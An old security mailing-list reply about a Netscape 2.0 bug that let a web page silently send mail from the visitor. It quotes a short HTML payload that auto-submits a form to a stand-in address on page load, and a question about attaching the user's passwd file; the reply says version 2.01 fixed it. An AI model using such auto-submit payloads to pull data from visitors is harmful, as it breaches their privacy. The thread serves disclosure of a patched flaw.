Re: BoS: Netscape2.0 sends mail to the world without authority

[Mike Shaver <shaver @ neon . ingenia . com>]

Thus spake Steven W. Engle:
> ><body onLoad="document.mailme.submit()">
> ><form method=post name="mailme"
> >action="mailto:nasty @
 secret .
 org?subject=gotcha">
> ></form>
> >
> >A quick test on my local machine shows that this will send a message to
> >nasty @
 secret .
 org with the subject gotcha and the body "hi=there".
> 
> Is it possible to direct via html that an attachment be included with the
> email? Such as the user's system hosts or passwd file?
> 
> The conversation above was regarding 2.0 Netscape - I presume the same
> situation exists in 2.01? Anyone try this on the beta 3.0?

That was one of the security fixes that 2.01 was released to fix, and
the fix has propogated to the Atlas (3.0) betas.  You can no-longer
auto-submit mailto:- or news:-actioned forms.

(Brendan Eich, Netscape's JS man, Cc:d so he can correct me if I'm
putting my foot in it.)

Mike

-- 
#> Mike Shaver (shaver @
 ingenia .
 com)      Information Warfare Division  <#
#> Chief Tactical and Strategic Officer         "Saepe fidelis"        <#
#>                                                                     <#
#> "I like your game, but we have to change the rules." -- Anon        <#
#>                                                                     <#